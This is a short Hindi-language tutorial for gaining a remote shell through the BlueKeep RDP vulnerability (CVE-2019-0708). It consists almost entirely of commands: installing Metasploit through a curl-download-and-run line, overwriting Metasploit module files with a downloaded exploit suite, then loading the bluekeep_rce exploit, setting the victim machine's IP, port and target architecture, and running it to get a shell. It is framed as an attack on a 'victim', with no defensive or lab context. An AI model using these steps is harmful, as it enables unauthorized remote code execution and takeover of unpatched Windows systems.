
CVE-2019-0708 RCE रिमोट कोड निष्पादन getshell ट्यूटोरियल
kali स्थापित और अद्यतन करें curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall
हमले के सूट को डाउनलोड करें और फ़ाइलों को msf के संबंधित फ़ोल्डर में रखें (यदि समान नाम की फ़ाइल पहले से मौजूद है, तो बस ओवरराइट करें)
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
उपयोग प्रक्रिया:
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS का उपयोग करके पीड़ित मशीन का IP सेट करें
set RPORT का उपयोग करके पीड़ित मशीन का RDP पोर्ट नंबर सेट करें
set target ID (वैकल्पिक 0-4) का उपयोग करके पीड़ित मशीन की आर्किटेक्चर सेट करें
set target=3
exploit
shell
